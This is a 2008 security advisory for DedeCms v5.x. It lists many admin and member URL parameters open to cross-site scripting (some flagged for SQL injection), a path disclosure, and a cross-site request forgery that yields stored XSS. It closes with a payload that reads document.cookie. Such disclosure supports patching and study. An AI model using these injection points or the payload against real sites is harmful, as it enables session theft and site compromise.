# .: Multiple Cross-Site Scripting Vulnerabilities in DedeCms v5.x # .: [Author] Depo2 - TpTLabs.com # .: [Affected versions] http://www.dedecms.com/ - DedeCms v5.x # .: [Credit] The disclosure of these issues has been credited to Depo2 # .: [Classification] # Attack Type: Input Manipulation # Impact: Loss of Integrity # Fix: N/A Public release vulnz: {26-08-2008 Sun} # Class Input Validation Error # Original Advisory http://depo2.nm.ru/DedeCmsv5.x_XSS.txt # Other Advisory http://www.xssing.com/index.php?x=3&y=53 - XSS - [DedeCms WebSite]/dede/catalog_tree.php?f=form1&opall=1&v=typeid&bt=[XSS] [DedeCms WebSite]/dede/catalog_tree.php?f=form1&opall=1&v=[XSS] [DedeCms WebSite]/dede/catalog_tree.php?f=[XSS] [DedeCms WebSite]/dede/content_list.php?arcrank=[XSS] [DedeCms WebSite]/dede/content_list.php?dopost=listArchives&nowpage=1&totalresult=0&arcrank=[XSS]&cid=[XSS/SQL]&keyword=[XSS]+&orderby=[XSS/SQL]&imageField=%CB%D1%CB%F7 [DedeCms WebSite]/dede/content_list.php?channelid=[XSS]&cid=0&adminid=[XSS] [DedeCms WebSite]/include/dialog/select_images.php?f=form1.picname&imgstick=[XSS] [DedeCms WebSite]/include/dialog/select_images.php?f=[XSS] [DedeCms WebSite]/dede/login.php?gotopage=[XSS] [DedeCms WebSite]/dede/article_keywords_select.php?f=[XSS] [DedeCms WebSite]/dede/file_pic_view.php?activepath=[XSS] [DedeCms WebSite]/member/login.php?gourl=[XSS] [DedeCms WebSite]/dede/pic_view.php?activepath=[XSS] - Php Path Discusion - [DedeCms WebSite]/include/dialog/ - XSRF - [DedeCms WebSite]/dede/sys_info.php? have XSRF edit___cfg_beian,edit___cfg_keywords etc.. parameter not checking evil code if attacker wright a "end of textarea" </textarea> tag thats give XSS alert :) [XSS Code] :</script>'"><script>alert(document.cookie)</script>
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论